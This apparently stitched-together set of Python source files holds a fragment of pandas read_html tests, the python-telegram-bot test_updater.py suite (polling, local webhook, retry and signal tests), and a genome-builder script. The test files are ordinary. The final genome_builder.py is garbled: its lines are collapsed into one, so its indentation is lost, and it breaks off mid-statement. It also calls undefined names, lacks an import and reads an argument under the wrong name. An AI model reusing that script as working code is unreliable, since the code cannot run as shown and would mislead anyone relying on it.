        # converters= overrides type inference (keep values as strings).
        result = self.read_html(
            """<table>
                <thead>
                    <tr>
                        <th>a</th>
                    </tr>
                </thead>
                <tbody>
                    <tr>
                        <td> 0.763</td>
                    </tr>
                    <tr>
                        <td> 0.244</td>
                    </tr>
                </tbody>
            </table>""",
            converters={"a": str},
        )[0]
        expected = DataFrame({"a": ["0.763", "0.244"]})
        tm.assert_frame_equal(result, expected)

    def test_na_values(self):
        # GH 13461
        # Values listed in na_values= become NaN after conversion.
        result = self.read_html(
            """<table>
                <thead>
                    <tr>
                        <th>a</th>
                    </tr>
                </thead>
                <tbody>
                    <tr>
                        <td> 0.763</td>
                    </tr>
                    <tr>
                        <td> 0.244</td>
                    </tr>
                </tbody>
            </table>""",
            na_values=[0.244],
        )[0]
        expected = DataFrame({"a": [0.763, np.nan]})
        tm.assert_frame_equal(result, expected)

    def test_keep_default_na(self):
        # keep_default_na=False preserves "N/A"/"NA" as literal strings.
        html_data = """<table>
            <thead>
                <tr>
                    <th>a</th>
                </tr>
            </thead>
            <tbody>
                <tr>
                    <td> N/A</td>
                </tr>
                <tr>
                    <td> NA</td>
                </tr>
            </tbody>
        </table>"""
        expected_df = DataFrame({"a": ["N/A", "NA"]})
        html_df = self.read_html(html_data, keep_default_na=False)[0]
        tm.assert_frame_equal(expected_df, html_df)

        expected_df = DataFrame({"a": [np.nan, np.nan]})
        html_df = self.read_html(html_data, keep_default_na=True)[0]
        tm.assert_frame_equal(expected_df, html_df)

    def test_preserve_empty_rows(self):
        # A row of empty cells is kept as a row of NaN, not dropped.
        result = self.read_html(
            """
            <table>
                <tr>
                    <th>A</th>
                    <th>B</th>
                </tr>
                <tr>
                    <td>a</td>
                    <td>b</td>
                </tr>
                <tr>
                    <td></td>
                    <td></td>
                </tr>
            </table>
            """
        )[0]

        expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
        tm.assert_frame_equal(result, expected)

    def test_ignore_empty_rows_when_inferring_header(self):
        # An all-empty <th> row does not contribute a header level.
        result = self.read_html(
            """
            <table>
                <thead>
                    <tr><th></th><th></tr>
                    <tr><th>A</th><th>B</th></tr>
                    <tr><th>a</th><th>b</th></tr>
                </thead>
                <tbody>
                    <tr><td>1</td><td>2</td></tr>
                </tbody>
            </table>
            """
        )[0]

        columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
        expected = DataFrame(data=[[1, 2]], columns=columns)
        tm.assert_frame_equal(result, expected)

    def test_multiple_header_rows(self):
        # Issue #13434
        # Round-trip a frame with 2-level columns through to_html/read_html.
        expected_df = DataFrame(
            data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
        )
        expected_df.columns = [
            ["Unnamed: 0_level_0", "Age", "Party"],
            ["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
        ]
        html = expected_df.to_html(index=False)
        html_df = self.read_html(html)[0]
        tm.assert_frame_equal(expected_df, html_df)

    def test_works_on_valid_markup(self, datapath):
        # Basic sanity: read_html returns a list of DataFrames.
        filename = datapath("io", "data", "html", "valid_markup.html")
        dfs = self.read_html(filename, index_col=0)
        assert isinstance(dfs, list)
        assert isinstance(dfs[0], DataFrame)

    @pytest.mark.slow
    def test_fallback_success(self, datapath):
        # Falls back through the flavor list until a parser succeeds.
        banklist_data = datapath("io", "data", "html", "banklist.html")
        self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])

    def test_to_html_timestamp(self):
        # Timestamps in the index survive to_html rendering.
        rng = date_range("2000-01-01", periods=10)
        df = DataFrame(np.random.randn(10, 4), index=rng)

        result = df.to_html()
        assert "2000-01-01" in result

    @pytest.mark.parametrize(
        "displayed_only,exp0,exp1",
        [
            (True, DataFrame(["foo"]), None),
            (False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
        ],
    )
    def test_displayed_only(self, displayed_only, exp0, exp1):
        # GH 20027
        # displayed_only=True skips display:none elements and tables.
        data = StringIO(
            """<html>
            <body>
                <table>
                    <tr>
                        <td>
                            foo
                            <span style="display:none;text-align:center">bar</span>
                            <span style="display:none">baz</span>
                            <span style="display: none">qux</span>
                        </td>
                    </tr>
                </table>
                <table style="display: none">
                    <tr>
                        <td>foo</td>
                    </tr>
                </table>
            </body>
            </html>"""
        )

        dfs = self.read_html(data, displayed_only=displayed_only)
        tm.assert_frame_equal(dfs[0], exp0)

        if exp1 is not None:
            tm.assert_frame_equal(dfs[1], exp1)
        else:
            assert len(dfs) == 1  # Should not parse hidden table

    def test_encode(self, html_encoding_file):
        # Same result whether input is raw bytes, a file-like, or a path;
        # the encoding is taken from the fixture file name (e.g. "x_utf-8").
        base_path = os.path.basename(html_encoding_file)
        root = os.path.splitext(base_path)[0]
        _, encoding = root.split("_")

        try:
            with open(html_encoding_file, "rb") as fobj:
                from_string = self.read_html(
                    fobj.read(), encoding=encoding, index_col=0
                ).pop()

            with open(html_encoding_file, "rb") as fobj:
                from_file_like = self.read_html(
                    BytesIO(fobj.read()), encoding=encoding, index_col=0
                ).pop()

            from_filename = self.read_html(
                html_encoding_file, encoding=encoding, index_col=0
            ).pop()
            tm.assert_frame_equal(from_string, from_file_like)
            tm.assert_frame_equal(from_string, from_filename)
        except Exception:
            # seems utf-16/32 fail on windows
            if is_platform_windows():
                if "16" in encoding or "32" in encoding:
                    pytest.skip()
            raise

    def test_parse_failure_unseekable(self):
        # Issue #17975
        # A non-seekable stream cannot be rewound for a second parse attempt.
        if self.read_html.keywords.get("flavor") == "lxml":
            pytest.skip("Not applicable for lxml")

        class UnseekableStringIO(StringIO):
            def seekable(self):
                return False

        bad = UnseekableStringIO(
            """
            <table><tr><td>spam<foobr />eggs</td></tr></table>"""
        )

        assert self.read_html(bad)

        with pytest.raises(ValueError, match="passed a non-rewindable file object"):
            self.read_html(bad)

    def test_parse_failure_rewinds(self):
        # Issue #17975
        # A seekable stream is rewound between parser attempts.
        class MockFile:
            def __init__(self, data):
                self.data = data
                self.at_end = False

            def read(self, size=None):
                data = "" if self.at_end else self.data
                self.at_end = True
                return data

            def seek(self, offset):
                self.at_end = False

            def seekable(self):
                return True

        good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
        bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")

        assert self.read_html(good)
        assert self.read_html(bad)

    @pytest.mark.slow
    def test_importcheck_thread_safety(self, datapath):
        # see gh-16928

        class ErrorThread(threading.Thread):
            # Thread subclass that stashes any exception raised by run().
            def run(self):
                try:
                    super().run()
                except Exception as err:
                    self.err = err
                else:
                    self.err = None

        # force import check by reinitalising global vars in html.py
        reload(pandas.io.html)

        filename = datapath("io", "data", "html", "valid_markup.html")
        helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
        helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))

        helper_thread1.start()
        helper_thread2.start()

        # Busy-wait until both threads finish, then check neither raised.
        while helper_thread1.is_alive() or helper_thread2.is_alive():
            pass
        assert None is helper_thread1.err is helper_thread2.err

    def test_parse_path_object(self, datapath):
        # GH 37705
        # pathlib.Path input must behave identically to a string path.
        file_path_string = datapath("io", "data", "html", "spam.html")
        file_path = Path(file_path_string)
        df1 = self.read_html(file_path_string)[0]
        df2 = self.read_html(file_path)[0]
        tm.assert_frame_equal(df1, df2)
test_updater.py
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2020
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
import logging
import os
import signal
import sys
import asyncio
from flaky import flaky
from functools import partial
from queue import Queue
from random import randrange
from threading import Thread, Event
from time import sleep

try:
    # python2
    from urllib2 import urlopen, Request, HTTPError
except ImportError:
    # python3
    from urllib.request import Request, urlopen
    from urllib.error import HTTPError

import pytest
from future.builtins import bytes

from telegram import TelegramError, Message, User, Chat, Update, Bot
from telegram.error import Unauthorized, InvalidToken, TimedOut, RetryAfter
from telegram.ext import Updater, Dispatcher, BasePersistence

# Marker for tests that deliver OS signals to the test process; on Windows
# a signal would terminate the whole process, so they are skipped there.
signalskip = pytest.mark.skipif(sys.platform == 'win32',
                                reason='Can\'t send signals without stopping '
                                       'whole process on windows')

if sys.platform.startswith("win") and sys.version_info >= (3, 8):
    """set default asyncio policy to be compatible with tornado
    Tornado 6 (at least) is not compatible with the default
    asyncio implementation on Windows
    Pick the older SelectorEventLoopPolicy on Windows
    if the known-incompatible default policy is in use.
    do this as early as possible to make it a low priority and overrideable
    ref: https://github.com/tornadoweb/tornado/issues/2608
    TODO: if/when tornado supports the defaults in asyncio,
    remove and bump tornado requirement for py38
    Copied from https://github.com/ipython/ipykernel/pull/456/
    """
    try:
        from asyncio import (
            WindowsProactorEventLoopPolicy,
            WindowsSelectorEventLoopPolicy,
        )
    except ImportError:
        pass
        # not affected
    else:
        if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
            # WindowsProactorEventLoopPolicy is not compatible with tornado 6
            # fallback to the pre-3.8 default of Selector
            asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())


class TestUpdater(object):
    """Tests for telegram.ext.Updater (polling, webhook and bootstrap)."""

    # Shared per-test state, reset by the autouse fixture below.
    message_count = 0
    received = None
    attempts = 0
    err_handler_called = Event()
    cb_handler_called = Event()

    @pytest.fixture(autouse=True)
    def reset(self):
        # Clear state left over from a previous test.
        self.message_count = 0
        self.received = None
        self.attempts = 0
        self.err_handler_called.clear()
        self.cb_handler_called.clear()

    def error_handler(self, bot, update, error):
        # Records the error message and signals that the error handler ran.
        self.received = error.message
        self.err_handler_called.set()

    def callback(self, bot, update):
        # Records the message text and signals that the update handler ran.
        self.received = update.message.text
        self.cb_handler_called.set()

    # TODO: test clean= argument of Updater._bootstrap

    @pytest.mark.parametrize(('error',),
                             argvalues=[(TelegramError('Test Error 2'),),
                                        (Unauthorized('Test Unauthorized'),)],
                             ids=('TelegramError', 'Unauthorized'))
    def test_get_updates_normal_err(self, monkeypatch, updater, error):
        # Recoverable errors are routed to the error handler and polling
        # keeps running.
        def test(*args, **kwargs):
            raise error

        monkeypatch.setattr(updater.bot, 'get_updates', test)
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        updater.dispatcher.add_error_handler(self.error_handler)
        updater.start_polling(0.01)

        # Make sure that the error handler was called
        self.err_handler_called.wait()
        assert self.received == error.message

        # Make sure that Updater polling thread keeps running
        self.err_handler_called.clear()
        self.err_handler_called.wait()

    def test_get_updates_bailout_err(self, monkeypatch, updater, caplog):
        # An InvalidToken is fatal: the error handler is NOT called and the
        # unhandled exception is logged by the updater thread.
        error = InvalidToken()

        def test(*args, **kwargs):
            raise error

        with caplog.at_level(logging.DEBUG):
            monkeypatch.setattr(updater.bot, 'get_updates', test)
            monkeypatch.setattr(updater.bot, 'set_webhook',
                                lambda *args, **kwargs: True)
            updater.dispatcher.add_error_handler(self.error_handler)
            updater.start_polling(0.01)
            assert self.err_handler_called.wait(1) is not True

        sleep(1)
        # NOTE: This test might hit a race condition and fail (though the 1 seconds delay above
        #       should work around it).
        # NOTE: Checking Updater.running is problematic because it is not set to False when there's
        #       an unhandled exception.
        # TODO: We should have a way to poll Updater status and decide if it's running or not.
        import pprint
        pprint.pprint([rec.getMessage() for rec in caplog.get_records('call')])
        assert any('unhandled exception in Bot:{}:updater'.format(updater.bot.id)
                   in rec.getMessage() for rec in caplog.get_records('call'))

    @pytest.mark.parametrize(('error',),
                             argvalues=[(RetryAfter(0.01),),
                                        (TimedOut(),)],
                             ids=('RetryAfter', 'TimedOut'))
    def test_get_updates_retries(self, monkeypatch, updater, error):
        # RetryAfter/TimedOut are retried internally and never reach the
        # error handler.
        event = Event()

        def test(*args, **kwargs):
            event.set()
            raise error

        monkeypatch.setattr(updater.bot, 'get_updates', test)
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        updater.dispatcher.add_error_handler(self.error_handler)
        updater.start_polling(0.01)

        # Make sure that get_updates was called, but not the error handler
        event.wait()
        assert self.err_handler_called.wait(0.5) is not True
        assert self.received != error.message

        # Make sure that Updater polling thread keeps running
        event.clear()
        event.wait()
        assert self.err_handler_called.wait(0.5) is not True

    def test_webhook(self, monkeypatch, updater):
        # Full webhook round trip: POST an update to the local webhook
        # server and check it reaches the dispatcher.
        q = Queue()
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr('telegram.ext.Dispatcher.process_update',
                            lambda _, u: q.put(u))

        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # Select random port
        updater.start_webhook(
            ip,
            port,
            url_path='TOKEN')
        sleep(.2)
        try:
            # Now, we send an update to the server via urlopen
            update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''),
                                               text='Webhook'))
            self._send_webhook_msg(ip, port, update.to_json(), 'TOKEN')
            sleep(.2)
            assert q.get(False) == update

            # Returns 404 if path is incorrect
            with pytest.raises(HTTPError) as excinfo:
                self._send_webhook_msg(ip, port, None, 'webookhandler.py')
            assert excinfo.value.code == 404

            with pytest.raises(HTTPError) as excinfo:
                self._send_webhook_msg(ip, port, None, 'webookhandler.py',
                                       get_method=lambda: 'HEAD')
            assert excinfo.value.code == 404

            # Test multiple shutdown() calls
            updater.httpd.shutdown()
        finally:
            updater.httpd.shutdown()
            sleep(.2)
            assert not updater.httpd.is_running
            updater.stop()

    def test_webhook_ssl(self, monkeypatch, updater):
        # Passing files that are not valid cert/key material must raise a
        # TelegramError (this .py file stands in for the bad cert).
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True)
        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # Select random port
        tg_err = False
        try:
            updater._start_webhook(
                ip,
                port,
                url_path='TOKEN',
                cert='./tests/test_updater.py',
                key='./tests/test_updater.py',
                bootstrap_retries=0,
                clean=False,
                webhook_url=None,
                allowed_updates=None)
        except TelegramError:
            tg_err = True
        assert tg_err

    def test_webhook_no_ssl(self, monkeypatch, updater):
        # Webhook server works over plain HTTP when no cert/key is given.
        q = Queue()
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr('telegram.ext.Dispatcher.process_update',
                            lambda _, u: q.put(u))

        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # Select random port
        updater.start_webhook(ip, port, webhook_url=None)
        sleep(.2)

        # Now, we send an update to the server via urlopen
        update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''),
                                           text='Webhook 2'))
        self._send_webhook_msg(ip, port, update.to_json())
        sleep(.2)
        assert q.get(False) == update
        updater.stop()

    def test_webhook_default_quote(self, monkeypatch, updater):
        # Updates received via webhook inherit the updater's default_quote.
        updater._default_quote = True
        q = Queue()
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr('telegram.ext.Dispatcher.process_update',
                            lambda _, u: q.put(u))

        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # Select random port
        updater.start_webhook(
            ip,
            port,
            url_path='TOKEN')
        sleep(.2)

        # Now, we send an update to the server via urlopen
        update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''),
                                           text='Webhook'))
        self._send_webhook_msg(ip, port, update.to_json(), 'TOKEN')
        sleep(.2)
        # assert q.get(False) == update
        assert q.get(False).message.default_quote is True
        updater.stop()

    @pytest.mark.skipif(not (sys.platform.startswith("win") and sys.version_info >= (3, 8)),
                        reason="only relevant on win with py>=3.8")
    def test_webhook_tornado_win_py38_workaround(self, updater, monkeypatch):
        # Verifies that the module-level event-loop-policy workaround above
        # actually took effect (tornado 6 vs ProactorEventLoop).
        updater._default_quote = True
        q = Queue()
        monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True)
        monkeypatch.setattr('telegram.ext.Dispatcher.process_update',
                            lambda _, u: q.put(u))

        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # Select random port
        updater.start_webhook(
            ip,
            port,
            url_path='TOKEN')
        sleep(.2)

        try:
            from asyncio import (WindowsSelectorEventLoopPolicy)
        except ImportError:
            pass
            # not affected
        else:
            assert isinstance(asyncio.get_event_loop_policy(),
                              WindowsSelectorEventLoopPolicy)

        updater.stop()

    @pytest.mark.parametrize(('error',),
                             argvalues=[(TelegramError(''),)],
                             ids=('TelegramError',))
    def test_bootstrap_retries_success(self, monkeypatch, updater, error):
        # set_webhook fails `retries` times, then succeeds: bootstrap
        # retries exactly that many times.
        retries = 2

        def attempt(*args, **kwargs):
            if self.attempts < retries:
                self.attempts += 1
                raise error

        monkeypatch.setattr(updater.bot, 'set_webhook', attempt)

        updater.running = True
        updater._bootstrap(retries, False, 'path', None, bootstrap_interval=0)
        assert self.attempts == retries

    @pytest.mark.parametrize(('error', 'attempts'),
                             argvalues=[(TelegramError(''), 2),
                                        (Unauthorized(''), 1),
                                        (InvalidToken(), 1)],
                             ids=('TelegramError', 'Unauthorized', 'InvalidToken'))
    def test_bootstrap_retries_error(self, monkeypatch, updater, error, attempts):
        # Unauthorized/InvalidToken abort immediately; generic TelegramError
        # is retried until the retry budget is exhausted, then re-raised.
        retries = 1

        def attempt(*args, **kwargs):
            self.attempts += 1
            raise error

        monkeypatch.setattr(updater.bot, 'set_webhook', attempt)

        updater.running = True
        with pytest.raises(type(error)):
            updater._bootstrap(retries, False, 'path', None, bootstrap_interval=0)
        assert self.attempts == attempts

    @flaky(3, 1)
    def test_webhook_invalid_posts(self, updater):
        # Malformed POSTs must be rejected with the proper HTTP error codes.
        ip = '127.0.0.1'
        port = randrange(1024, 49152)  # select random port for travis
        thr = Thread(
            target=updater._start_webhook,
            args=(ip, port, '', None, None, 0, False, None, None))
        thr.start()

        sleep(.2)

        try:
            with pytest.raises(HTTPError) as excinfo:
                self._send_webhook_msg(ip, port,
                                       '<root><bla>data</bla></root>',
                                       content_type='application/xml')
            assert excinfo.value.code == 403

            with pytest.raises(HTTPError) as excinfo:
                self._send_webhook_msg(ip, port, 'dummy-payload', content_len=-2)
            assert excinfo.value.code == 500

            # TODO: prevent urllib or the underlying from adding content-length
            # with pytest.raises(HTTPError) as excinfo:
            #     self._send_webhook_msg(ip, port, 'dummy-payload', content_len=None)
            # assert excinfo.value.code == 411

            with pytest.raises(HTTPError):
                self._send_webhook_msg(ip, port, 'dummy-payload',
                                       content_len='not-a-number')
            assert excinfo.value.code == 500

        finally:
            updater.httpd.shutdown()
            thr.join()

    def _send_webhook_msg(self, ip, port, payload_str, url_path='',
                          content_len=-1, content_type='application/json',
                          get_method=None):
        # Helper: POST payload_str to the local webhook server.
        # content_len semantics: -1 = compute from payload, None = omit the
        # header, anything else is sent verbatim (to test bad values).
        headers = {'content-type': content_type, }

        if not payload_str:
            content_len = None
            payload = None
        else:
            payload = bytes(payload_str, encoding='utf-8')

        if content_len == -1:
            content_len = len(payload)

        if content_len is not None:
            headers['content-length'] = str(content_len)

        url = 'http://{ip}:{port}/{path}'.format(ip=ip, port=port, path=url_path)

        req = Request(url, data=payload, headers=headers)

        if get_method is not None:
            req.get_method = get_method

        return urlopen(req)

    def signal_sender(self, updater):
        # Waits for the updater to start, then sends SIGTERM to ourselves.
        sleep(0.2)
        while not updater.running:
            sleep(0.2)

        os.kill(os.getpid(), signal.SIGTERM)

    @signalskip
    def test_idle(self, updater, caplog):
        # idle() must return (and stop the updater) when SIGTERM arrives.
        updater.start_polling(0.01)
        Thread(target=partial(self.signal_sender, updater=updater)).start()

        with caplog.at_level(logging.INFO):
            updater.idle()

        rec = caplog.records[-1]
        assert rec.msg.startswith('Received signal {}'.format(signal.SIGTERM))
        assert rec.levelname == 'INFO'

        # If we get this far, idle() ran through
        sleep(.5)
        assert updater.running is False

    @signalskip
    def test_user_signal(self, updater):
        # A user-supplied signal handler runs in addition to shutdown.
        temp_var = {'a': 0}

        def user_signal_inc(signum, frame):
            temp_var['a'] = 1

        updater.user_sig_handler = user_signal_inc
        updater.start_polling(0.01)
        Thread(target=partial(self.signal_sender, updater=updater)).start()
        updater.idle()

        # If we get this far, idle() ran through
        sleep(.5)
        assert updater.running is False
        assert temp_var['a'] != 0

    def test_create_bot(self):
        # Constructing from a token creates a Bot instance.
        updater = Updater('123:abcd')
        assert updater.bot is not None

    def test_mutual_exclude_token_bot(self):
        # token= and bot= cannot be combined.
        bot = Bot('123:zyxw')
        with pytest.raises(ValueError):
            Updater(token='123:abcd', bot=bot)

    def test_no_token_or_bot_or_dispatcher(self):
        # At least one of token/bot/dispatcher is required.
        with pytest.raises(ValueError):
            Updater()

    def test_mutual_exclude_bot_private_key(self):
        # bot= and private_key= cannot be combined.
        bot = Bot('123:zyxw')
        with pytest.raises(ValueError):
            Updater(bot=bot, private_key=b'key')

    def test_mutual_exclude_bot_dispatcher(self):
        # bot= and dispatcher= cannot be combined.
        dispatcher = Dispatcher(None, None)
        bot = Bot('123:zyxw')
        with pytest.raises(ValueError):
            Updater(bot=bot, dispatcher=dispatcher)

    def test_mutual_exclude_persistence_dispatcher(self):
        # persistence= belongs to the dispatcher, not alongside one.
        dispatcher = Dispatcher(None, None)
        persistence = BasePersistence()
        with pytest.raises(ValueError):
            Updater(dispatcher=dispatcher, persistence=persistence)

    def test_mutual_exclude_workers_dispatcher(self):
        # workers= belongs to the dispatcher, not alongside one.
        dispatcher = Dispatcher(None, None)
        with pytest.raises(ValueError):
            Updater(dispatcher=dispatcher, workers=8)

    def test_mutual_exclude_use_context_dispatcher(self):
        # use_context= must match the supplied dispatcher's setting.
        dispatcher = Dispatcher(None, None)
        use_context = not dispatcher.use_context
        with pytest.raises(ValueError):
            Updater(dispatcher=dispatcher, use_context=use_context)
genome_builder.py
""" Created on June 20, 2014 @author: Joseph Korpela """ import time import random import sys import re import argparse import pickle import shutil import unittest import os import chromosome_builder import reads_mixer class genome_builder(): def __init__(self, args=None): if not args: args = self.parse_system_args() self._genome_id = args.id self._nbr_chromosome = args.nbr_chr self._chromosome_size = args.chr_size self._scale = args.scale self._use_alu = args.alu self._use_assembly = args.assembly self._allele_base_list = ["C", "T", "G", "A"] self._reads_file = "reads_" + str(self._genome_id) + ".txt" self._chromosome_reads_file = "reads_" + str(self._genome_id) + "_chr_" self._base_alu_file = "alu_" + str(self._genome_id) + ".txt" if self._use_alu: self._base_alu = self.generate_base_alu() def insert_newlines(self, sequence, line_size=80): return '\n'.join(sequence[i:i+line_size] for i in range(0, len(sequence), line_size)) def write_genome_lines_to_file(self, genome, file_object): genome = self.insert_newlines(genome, 80) file_object.write(genome) def parse_fasta(self, file_name, buffer_size=100000): """Gives buffered access to large fasta files so that the entire file doesn't need to be loaded into memory all at once. Works as a generator, yielding a block of up to buffer_size with each call. For general use, use: for sequence in parse_fasta(file_name, buffer_size) This yield sequences until the end of file or a '>' character is found, at which point it yields None Since None is yielded for '>', this can be used with multiple chromosomes separated by '>chr#' in a single file. 
To do so, the generator should be initialized before iterating through chromosomes, then as each chromosome is processed you can anticipate None will be yielded one time to mark the end of the current chromoeome :param file_name: the file to read in :param buffer_size: the number of characters to return for each iteration :returns: Sequences of up to size buffer_size, or None if EOF or '>' is encountered """ with open(file_name) as fasta_file: start_of_file = True buffer = "" while True: for line in fasta_file: #skip initial documentation lines if start_of_file and '>' in line: pass #each chromosome is marked by a > line, so need to catch this switch elif not start_of_file and '>' in line: if len(buffer) == 0: yield None else: #first yield the buffer, then yeild None to flag the end of the chromosome yield buffer buffer = '' yield None else: if start_of_file: start_of_file = False buffer += line.strip() if len(buffer) >= buffer_size: yield buffer[:buffer_size] buffer = buffer[buffer_size:] #clear out any remaining buffer when the file is done if len(buffer) > 0: yield buffer buffer = '' else: yield None def random_sequence(self, seq_len): return "".join(random.choice(self._allele_base_list) for i in range(seq_len)) def generate_base_alu(self): alu_len = random.randint(self._alu_min_length, self._alu_max_length) self._base_alu = self.random_sequence(alu_len) def worker(self, chromosome): args = TestSetting() args.id = self._genome_id args.chr_id = chromosome args.chr_size = self._chromosome_size args.scale = self._scale args.alu = self._use_alu args.assembly = self._use_assembly args.base_alu = random_sequence(300) gen = chromosome_builder(args) print('chromosome ' + str(chromosome) + ' generating ref genome') gen.generate_ref_genome() print('chromosome ' + str(chromosome) + ' generating donor genome') gen.generate_donor_genome() print('chromosome ' + str(chromosome) + ' generating reads') gen.generate_reads() def generate_chromosome(self): """ Generates a random 
reference genome with the specified number of chromosomes, each of length length_chromosome """ if self._use_alu: with open(self._base_alu_file, "w") as alu_file: self.write_genome_lines_to_file(self._base_alu, alu_file) jobs = [] for chromosome in range(1, self._num_chromosomes + 1): chr_builder = multiprocessing.Process(target=worker, name='worker') jobs.append(chr_builder) chr_builder.start() for job in jobs: job.join() mixer = reads_mixer(self._genome_id) def parse_system_args(self): parser = argparse.ArgumentParser( description="This script generates a reference and donor genome as a set " "of files. The files can be used for various computational " "genetics purposes. The following files are created: 1) " "reference genome \'ref_*.txt\' 2) mutated donor genome " "\'private_*.txt\' 3) paired-end reads \'reads_*.txt\'" "from donor genome 4) mutation answer key \'ans_*.txt\'" ) parser.add_argument( "--id", type=str, default='test', help="The name or ID of this genome for identification purposes. The " "genome id will be reflected in the generated file names." ) parser.add_argument( "--num_chr", type=int, default='1', help="The number of chromosomes to generate for the genome." ) parser.add_argument( "--chr_size", type=int, default='10', help="The size of each chromosome, multiplied by -s (scaling factor). Change " "scale with -s option" ) parser.add_argument( "-s", "--scale", type=str, choices=["k", "m", "b"], default="k", help="the amount to scale chromosome-size by. k: thousands, m: millions," " b: billions. By default, scale is k (thousands)." ) parser.add_argument( "--alu", type=str, choices=["y", "n"], default="n", help="whether to include Alus in the genome." ) parser.add_argument( "--assembly", type=str, choices=["y", "n"], default="n", help="whether to generate output for assembly (no reference genome)." 
) return parser.parse_args() class TestClass(unittest.TestCase): def setUp(self): self.gen = genome_builder() def test_generate_base_alu(self): self.gen._alu_min_length = 300 self.gen._alu_max_length = 301 self.gen._base_alu = '' self.gen.generate_base_alu() self.assertTrue(len(self.gen._base_alu) >= self.gen._alu_min_length) self.assertTrue(len(self.gen._base_alu) <= self.gen._alu_max_length) for allele in self.gen._base_alu: self.assertTrue(allele in ['T','A','C','G']) def test_write_genome_lines_to_file(self): length_list = [0,1,79,80,81] for i in length_list: self.gen._alu_min_length = i self.gen._alu_max_length = i self.gen.generate_base_alu() with open('test_file', 'w') as test_file: self.gen.write_genome_lines_to_file(self.gen._base_alu, test_file) with open('test_file', 'r') as test_file: base_alu = '' for line in test_file: base_alu += str(line).strip() self.assertEqual(base_alu, self.gen._base_alu) os.remove('test_file') def test_parse_fasta(self): nbr_chr_list = [1,2,3] length_list = [1,79,80,81] for nbr_chr in nbr_chr_list: for next_len in length_list: self.gen._alu_min_length = next_len self.gen._alu_max_length = next_len self.gen.generate_base_alu() file_name = 'test_file_' + str(nbr_chr) + '_' + str(next_len) with open(file_name, 'w') as test_file: test_file.write('>test') for chr in range(1, nbr_chr + 1): test_file.write('\n>chr' + str(chr) + '\n') self.gen.write_genome_lines_to_file(self.gen._base_alu, test_file) for sequence in self.gen.parse_fasta(file_name): if sequence: base_alu = sequence self.assertEqual(base_alu, self.gen._base_alu) else: break os.remove(file_name) def test_generate_chromosome(self): args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = 10 args.scale = 'k' args.alu = 'n' args.assembly = 'n' self.gen = genome_gen(args) self.gen._nbr_snp = 0 self.gen._nbr_denovo_str = 0 self.gen._nbr_denovo_cnv = 0 self.gen._nbr_long_inv = 0 self.gen._nbr_long_ins = 0 self.gen._nbr_long_del = 0 self.gen._nbr_ref_alu = 0 
self.gen._nbr_denovo_alu = 0 self.gen._nbr_ref_str = 0 self.gen._nbr_ref_cnv = 0 self.gen._nbr_short_inv = 0 self.gen._nbr_short_ins = 0 self.gen._nbr_short_del = 0 self.gen._cnv_mutation_amount = 0 self.gen._str_mutation_amount = 0 self.gen.generate_ref_genome() self.gen.generate_donor_genome() ref_genome = '' for sequence in self.gen.parse_fasta(self.gen._ref_genome_file): if sequence: ref_genome += sequence else: break donor_genome = '' for sequence in self.gen.parse_fasta(self.gen._priv_genome_file): if sequence: donor_genome += sequence else: break self.assertEqual(ref_genome, donor_genome) for alu in ['y', 'n']: for test_args in [[10, 'k'], [100, 'k'], [150, 'k']]: args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = test_args[0] args.scale = test_args[1] args.alu = alu args.assembly = 'n' self.gen = genome_gen(args) self.gen._alu_min_length = 300 self.gen._alu_max_length = 300 self.gen._alu_mutation_rate = 0.3 self.gen.generate_ref_genome() self.gen.generate_donor_genome() ref_genome = '' for sequence in self.gen.parse_fasta(self.gen._ref_genome_file): if sequence: ref_genome += sequence else: break donor_genome = '' for sequence in self.gen.parse_fasta(self.gen._priv_genome_file): if sequence: donor_genome += sequence else: break last_end = 0 for i in 